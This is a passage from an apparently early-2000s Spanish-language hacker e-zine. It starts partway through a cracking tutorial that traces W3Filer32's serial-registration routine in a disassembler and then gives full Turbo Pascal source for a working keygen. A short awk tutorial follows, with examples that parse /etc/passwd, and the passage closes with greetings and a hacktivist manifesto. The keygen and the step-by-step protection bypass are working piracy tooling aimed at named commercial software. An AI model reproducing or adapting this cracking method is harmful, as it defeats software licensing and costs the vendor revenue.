el numero de serie de memoria, aun que te apuesto que lo volveras a ver al correr al debugger, abre el debugger, pon un password en GetDlgItemTextA, y presiona OK, ahora ya estas dentro del GetDlgItemTextA, deja que encuentre la rutina de registro. Ejemplo: :00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8] :00404DB8 52 push edx ---> El nombre de usuario aparece aqui. :00404DB9 E80B550000 call 0040A2C9 ---> Rutina de Registro. :00404DBE 83C408 add esp, 00000008 ---> El serial exacto que debe ser. :00404DC1 85C0 test eax, eax ---> Identificador, 0 si es correcto :00404DC3 7D17 jge 00404DDC ---> Resgistro incorrecto, 1 Ok. Ahora deja entrar la llamada 40A2C9, y vee lo que es: :00404DB9 , :00407F76 :0040A2C9 55 push ebp :0040A2CA 8BEC mov ebp, esp :0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0 :0040A2D2 53 push ebx :0040A2D3 56 push esi :0040A2D4 57 push edi :0040A2D5 8B5508 mov edx, dword ptr [ebp+08] :0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00] :0040A2DE 33C0 xor eax, eax :0040A2E0 EB16 jmp 0040A2F8 |:0040A2FB(C) | :0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Aqui comienxa lo interesante. :0040A2E5 83F920 cmp ecx, 00000020 ----> ECX Es el nombree de usuario corriente, umm. :0040A2E8 740D je 0040A2F7 ----> Veamos, :0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generalmente todas estas copias del nombree de usuario vienen de [EDX], hacia [ESI], sin espacios! Recuerda Esto :0040A2EC 880C06 mov byte ptr [esi+eax], cl :0040A2EF 42 inc edx :0040A2F0 40 inc eax :0040A2F1 C6040600 mov byte ptr [esi+eax], 00 :0040A2F5 EB01 jmp 0040A2F8 |:0040A2E8(C) | :0040A2F7 42 inc edx |:0040A2E0(U), :0040A2F5(U) | :0040A2F8 803A00 cmp byte ptr [edx], 00 :0040A2FB 75E5 jne 0040A2E2 ----->Esta es otra copia, y dejas que se haga el codigo. :0040A2FD 56 push asi --------> El nombre de usuario cambia en orden acendente a los carecteres. . :0040A2FE E80F330000 Call User!CharUpper ---> Despues de esto el nombre esta en el caso superior. :0040A303 56 push esi -----> El nombre en el caso superiror aqui. :0040A304 E86F300000 Call 0040D378 ---> Esta es la longitud del nombre. :0040A309 59 pop ecx :0040A30A 8BC8 mov ecx, eax ---> ECX=Length. :0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST). :0040A30F 7D05 jge 0040A316 --->Ve a esta direccion... :0040A311 83C8FF or eax, FFFFFFFF :0040A314 EB67 jmp 0040A37D |:0040A30F(C) | :0040A316 33D2 xor edx, edx :0040A318 33C0 xor eax, eax :0040A31A 3BC8 cmp ecx, eax :0040A31C 7E17 jle 0040A335 ---> No es importante, solo es otra comprobacion inutil. * De aqui en adelante lo importante el codigo, asi que pon atencion. Una cosa importante antes de continuar es que EDX = 00000000h. |:0040A333(C) | :0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- Caracteres del nombre de usuarion, fuera de EAX. :0040A322 C1E303 shl ebx, 03 -----> Umm este es el valor 03h...(Recuerdalo). :0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Ahora EDI <--- Caracteres en el nombre de usuario , fuera det EAX. :0040A329 0FAFF8 imul edi, eax -----> Esto multiplica el numero de caracteres por el numero de caracteres de fueera de EAX.! (Recuerdalo). :0040A32C 03DF add ebx, edi -----> Adiere el resultado a EBX (Esto se desproteje A fuerzas =o) :0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - Este es el nucleo de la rutina de registro!!! :0040A330 40 inc eax -----> Aumenta EAX por uno (Siguiente caracter). :0040A331 3BC8 cmp ecx, eax :0040A333 7FE9 jg 0040A31E ----> If ECX<EAX Despues te sales :0040A335 A120674100 mov eax, dword ptr [00416720] ---> Ummmm, que hace esto aqui????? :0040A33A C1F803 sar eax, 03. ---------> Espera! escribe en el SoftIce '? EAX' Se te hace conisdo ese numero de EAX? Sino pues dejame decirte que es el numero de serie, porfavor veelo por ti mismo y no me creas. Ok ahora sabes que SHR'S EAX por 03 (SAR es casi identico a SHR). :0040A33D 03D0 -----> Agrega el resultado desde la copia del numero de serie shr'd por 03h :0040A33F 52 push edx ---> Dejalo continuar, en este punto puedo decirte que el numero de registro es en EDX que es como tu entras. :0040A340 685EF54000 push 0040F55E :0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0] :0040A34B 52 push edx :0040A34C E8E5320000 Call 0040D636 ----->Este solo hace HEX2STR (Toma el valor desde EDX y vuelve a una entrada HEX). ::0040A351 83C40C add esp, 0000000C :0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> Tipo 'd ecx' - Este es el numero de registro. :0040A35A 51 push ecx :0040A35B E8B8320000 Call 0040D618 :0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0] :0040A366 50 push eax :0040A367 FF750C push [ebp+0C] :0040A36A E875300000 Call 0040D3E4 :0040A36F 83C408 add esp, 00000008 :0040A372 85C0 test eax, eax :0040A374 7405 je 0040A37B :0040A376 83C8FF or eax, FFFFFFFF :0040A379 EB02 jmp 0040A37D |:0040A374(C) | :0040A37B 33C0 xor eax, eax |:0040A314(U), :0040A379(U) | :0040A37D 5F pop edi :0040A37E 5E pop esi :0040A37F 5B pop ebx :0040A380 8BE5 mov esp, ebp :0040A382 5D pop ebp :0040A383 C3 ret Ok, ahora hagamos el key. Ahora que ya te mostre la forma de calcular el numero de serie, pues te sera facil hacer el Key si tener que ver mi codigo fuente(En Turbo Pascal). -----------------------------Comienza aqui----------------- Program W3FilerKeygen; var Key,SerialNum,EB,ED,digit:Longint; I,x:Byte; Name,KeyHex:String; begin Writeln(' W3Filer32 V1.1.3 Keymaker'); writeln('Cracked by AnArKo'); Write('Your Name:'); { Lee el nombre } readln(Name); Write('Serial Number:'); readln(SerialNum); {Si, necesitamos el calculo del numero de serie!} Key:=0; x:=0; For I:=1 to length(Name) do begin Name[I]:=upcase(Name[i]); If Name[I]<>' ' then begin eb:=ord(Name[I]) shl 3; {EB = Nombre[I] Shl 03h} Ed:=ord(Name[I]); {ED = Nombre[I]} ed:=ed*(x); {ED=ED*Fuera de} inc(x); eb:=eb+ed; {Adiere ED a EB} Key:=Key+EB; {Adiere EB a KEY} end; end; Key:=Key+(SerialNum shr 3); { Adiere numero de serie shr 03h a Key} { Desde aqui, esto es solamente HEX2STRING --> es la personalidad, va y crea nuevamente las bases de los numeros! =0)} KeyHex:=''; repeat digit:=Key mod 16; key:=key div 16; If digit<10 then KeyHex:=Chr(Digit+ord('0'))+KeyHex; If digit>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex; until key=0; writeln('Your Key:',KeyHex); writeln(' Enjoy!'); end. -----------------Fin------------ Quiero agradecer a AnArKhy por darme la autorizacion de publicar este pequeño tutorial, que te puede ayudar a ti a darte una gran idea de como hacer un keygen. [11]----------------------[Introduccion a AWK]-------------------------[11] INTRODUCCION A AWK por Dark0de awk es una herramienta muy útil, para cuándo queramos hacer nuestros sh, bash, csh scripts. Algunos dicen que awk es un lenguaje de programación pero yo más bien lo asignaría como un filtro muy potente. Y es muy útil para cuándo querámos trabajar con archivos muy grandes y con información muy importante, como el ya tan conocido y estudiado /etc/passwd , etc/group/ , .rhosts , /etc/inittab , /etc/rc , etc. awk puede ser llamado de dos formas diferentes, la primera es dandolé las ordenes directamente desde la línea de comandos y la segunda que es llamandolo con el parametro "-f" dondé le diremos de que archivo dondé se encuentran las ordenes (un vil archivo script). Ej: ### #1# ### $ awk '/^d/' /etc/passwd (Esto visualizara del archivo, ya saben cuál todas las líneas que empiecen con "d") ### #2# ### $ cat $HOME/script.awk BEGIN { FS = ":" ; x = 0 } $3 > x { x = $3 } END { print x } $ awk -f $HOME/script.awk awk permite diferentes opciones que son: -Fs Asi le diremos que un separador de campos es el carácter "s" . Cada uno de los campos de una línea del fichero que se procesa puede ser llamado por las variables $1, $2, $NF (indica el número de campos). Y la variable $0 se refiere a la línea completa, muy diferente que a ms-dos o otros scripts dondé $0 es el nombre del script. -v variable=valor Como se ve, el valor es asignado a la variable antes de que comienze el programa, esto también se puede hacer en el bloque BEGIN. Hay algunas variables que ya están por defecto algunas de las más importantes son: FILENAME : Es el nombre del fichero que se está procesando. FNR : Número de línea del fichero que se está procesando. FS : Indica cuál es el carácter serparador de campos que por defecto es el espacion en blanco. NR : Número de líneas procesadas. $n : Número de campo que se está procesando Las órdenes en awk llevan un patrón y una acción, dondé la acción va entre { } . patrón { acción } Si hace faltan el patrón se aplicara a todo y si hace falta la acción, nada mas se visualizara la línea en la que se encuentre. Ejemplos usando awk: $date Wed May 30 12:54:11 EDT 2001 $date | awk '{print $0; print $2; print$6}' Wed May 30 12:54:50 EDT 2001 May 2001 Los patrones (que se han de estar preguntando sobre ellos) en awk pueden ser cualquiera de estos: BEGIN END /expresiones/ /relaciones/ /coincidencia/ BEGIN y END son especiales a los demás ya que el patrón BEGIN permite especificar una serie de procedimientos que se ejecutaran primero, aquí es dondé deben meter sus variables de uso global. Y en END se especifíca los procedimientos que se ejecutaran hasta que ya se hayan ejecutado las líneas anteriores. En /expresiones/ se ejecuta cada línea que concuerde con esta expresión, como los caractéres /^d/ , etc. En /relaciones/ se puede hacer uso de cualquier operador, que son los mismos operadores relacionales de C. En /coincidencia/ se utilizan los operadores ~ (coincide) y !~ (no coincide) para ver si se realiza la acción. También se pueden utilizar los operadores ya conocidos por ustedes de && (and), || (or), ! (not); exceptuando en los patrones BEGIN y END Ejemplo: BEGIN { FS = ":"} /^p/ || /^z/ { print $1 ; print $2; print $3} # si la linea comienza con "p" visualizara # el primer campo, si aplicamos esto al #/etc/passwd nos visualizara el usuario, #password y uid. END { print NR } #numero de lineas procesadas Y por esta ocasión es todo lo que veremos de awk, esperense a la siguiente e-zine. <-----------------------------[Despedida]---------------------------------> como siempre es un placer realizar estas e-zines en esta ocacion se las las dedicamos a todos en el 2600 y a esa gente que nos apoyo desde el principio. a todos los mexicanos que no se dejan enga~ar y que siguen luchando por lo que creen. La verdad nos hara libres y es nuestro propocito es buscarla, y se que juntos la encontraremos. <------------------------[Oficial Greets to:]-----------------------------> anthrax, Java, Absolut, MIBXXX, Darkode, Rulo, Z3r0, CTRL, Loco mx <--------------------[X'tra oficial Greets to:]---------------------------> DarcAngel, Dr F^Disk, Grand Master Y, Fatal, Megaflop, Vlad, Altekx, Kukulkan, DeadSector 12r y ICE SpYdEr 404,y demas que olvidamos <----------------------------[ORGS Greets]--------------------------------> 2600 mx, IH, Rebeli0n, Hackers.com.mx, Vanhackez, UHA, RMHT, <-------------------------------------------------------------------------> la religion es lo mas importante para una persona en esta vida para nosotros el hactivismo es nuestra religion es en lo que creemos y por lo que luchamos, abajo todos los monopolios. la gente estupida se deja controlar, nosotros no!!! nuestras mentes y nuestra voluntad son nuestras unicas armas pero lucharemos con ellas sin miedo alguno y con la frente en alto. juntos obtendremos nuestro objetivo. la mercadotecnia es una herramienta de inteligentes para controlar mentes debiles y nosotros no somos debiles decimos lo que pensamos y creemos. usando la mercadotecnia en su contra. Java. <-------------------------------------------------------------------------> 3l 60b!3rn0 cr33 qu3 s0m05 3stup!d05... 3l p0d3r 35t4 3n l4 !nf0rm4c|0n L4 inf0rm4ci0n 3st4 3n L4 r3d L4 r3d 3st4 3n nu35tr4z m4n0s s! l4z k0mput4d0r4z n0z v4n 4 d0m!n4r... p0rqu3 no l4s 3mp3zam0z a d0m!n4r a 3ll4z ? an Acid Klan creation